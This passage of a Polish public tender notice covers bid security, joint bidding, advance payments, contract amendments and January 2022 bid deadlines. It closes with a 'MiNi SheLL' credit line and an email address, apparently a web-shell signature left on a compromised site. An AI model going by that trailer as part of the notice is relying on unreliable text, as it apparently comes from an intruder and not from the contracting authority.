gwarancji lub poręczenia będzie skuteczne, jeżeli zostanie złożone w oryginale gwarancji lub poręczenia w postaci elektronicznej podpisanym przez osobę upoważnioną do wystawienia gwarancji lub poręczenia wraz z ofertą.<br/>8. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać nieodwoływalne i bezwarunkowe, na każde żądanie zgłoszone przez Zamawiającego, zobowiązanie gwaranta (poręczyciela) do zapłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 Ustawy Pzp. Ponadto powinien być wskazany termin obowiązywania gwarancji (poręczenia), który nie może być krótszy niż termin związania ofertą. <br/>9. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2-4, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli: <br/>1) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 ustawy Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej;<br/> 2) Wykonawca, którego oferta została wybrana: <br/> a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, <br/> b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; <br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wymogi dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy<br/>dołączyć do oferty.<br/>3) Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia<br/>4) W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp , Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia składają oświadczenie, z którego wynika, usługi<br/>wykonają poszczególni wykonawcy.<br/>5) Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego<br/>kopii umowy regulującej współpracę tych wykonawców<br/>2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi<br/>stosunków prawnych.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą:<br/>1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów. Załącznik 7b do SWZ<br/>2) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału podmiotu<br/>udostępniającego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zamawiający przekaże Wykonawcy w terminie do 360 dni od dnia podpisania umowy, zaliczkę stanowiącą wkład własny Zamawiającego, w kwocie nie mniejszej niż 5 % wynagrodzenia Wykonawcy, o którym mowa w §7 ust. 1 umowy. Na dzień zawarcia umowy zaliczka stanowi kwotę ……. (słownie: …), tj. ……% (słownie: ….) wynagrodzenia Wykonawcy.<br/>2. Zaliczka zostanie wypłacona na podstawie faktury zaliczkowej, wystawionej przez Wykonawcę.<br/>3. Zamawiający może żądać od Wykonawcy wniesienia zabezpieczenia zaliczki w jednej lub kilku następujących formach:<br/>1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości;<br/>5)	w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej;<br/>6)	przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego;<br/>7)	przez ustanowienie zastawu rejestrowego na zasadach określonych w ustawie z dnia 6 grudnia 1996 r. o zastawie rejestrowym i rejestrze zastawów (Dz. U. z 2018 r. poz. 2017).<br/>4. Jeśli wartość zaliczki przekroczy 20 % wysokości wynagrodzenia Wykonawcy, Zamawiający zażąda od Wykonawcy przed wypłaceniem zaliczki wniesienia jej zabezpieczenia, zgodnie z ust. 20 powyżej (art. 442 Pzp) w formie …..…………. (zostanie wpisane zgodnie z formularzem ofertowym Wykonawcy) w wysokości kwoty udzielanej zaliczki. ***<br/>5. Zwrot zabezpieczenia zaliczki nastąpi w terminie 30 dni od dnia jej rozliczenia.***<br/>6. Gwarancja bankowa lub ubezpieczeniowa na kwotę zaliczki powinna być wystawiona na okres realizacji przedmiotu zamówienia objętych zaliczką + 1 miesiąc.*** (*** - zastosowanie w przypadku, gdy dotyczy)<br/>7. Po podpisaniu umowy, nie później jednak niż w 360 dniu trwania umowy, Zamawiający przekaże zaliczkę dla Wykonawcy, w kwocie nie mniejszej niż 5% wynagrodzenia, stanowiącą wkład własny Zamawiającego, w związku z realizacją projektu dofinansowanego w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, pozostała część wynagrodzenia wypłacona zostanie po zakończeniu realizacji inwestycji na podstawie faktury końcowej, o której mowa w ust. 15, w której ujęta zostanie zapłacona wartość zaliczki oraz pozostała do wypłaty część wynagrodzenia. <br/>8. Zamawiający przed podpisaniem umowy oraz przed jej zakończeniem każdorazowo wyliczy faktyczny poziom procentowy finansowego udziału własnego przekazanego w formie zaliczki w stosunku do wartości wynagrodzenia wynikającego z oferty bądź umowy i zawartych w jej trakcie aneksów. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Umowa zawarta zostanie z uwzględnieniem postanowień wynikających z treści SWZ oraz danych zawartych w ofercie. <br/>2. Umowy w sprawach zamówień publicznych są jawne i podlegają udostępnianiu na zasadach określonych w przepisach o dostępie do informacji publicznej. <br/>3. Do SWZ dołączony jest wzór umowy - załącznik nr 8 do SIWZ, stanowiący jej integralną część, w którym Zamawiający przewidział wszystkie istotne dla stron postanowienia oraz przyszłe zobowiązania Wykonawcy i Zamawiającego, w tym dotyczące możliwości dokonywania zmian (§ 2, 6, 7, 14 projektu Umowy)<br/>4. Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności zmiany. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.<br/>5. Poza sytuacjami dopuszczającymi dokonanie zmian umowy, przewidzianymi we wzorze umowy, dopuszczalne są wszelkie zmiany nieistotne umowy rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania. Takimi zmianami są zmiany o charakterze administracyjno - organizacyjnym umowy np. zmiana nr konta bankowego, dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno - prawnej w trakcie trwania umowy, innych danych identyfikacyjnych, zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy.<br/>6. Zmiany umowy nie mogą naruszać postanowień zawartych w art. 455 ustawy PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com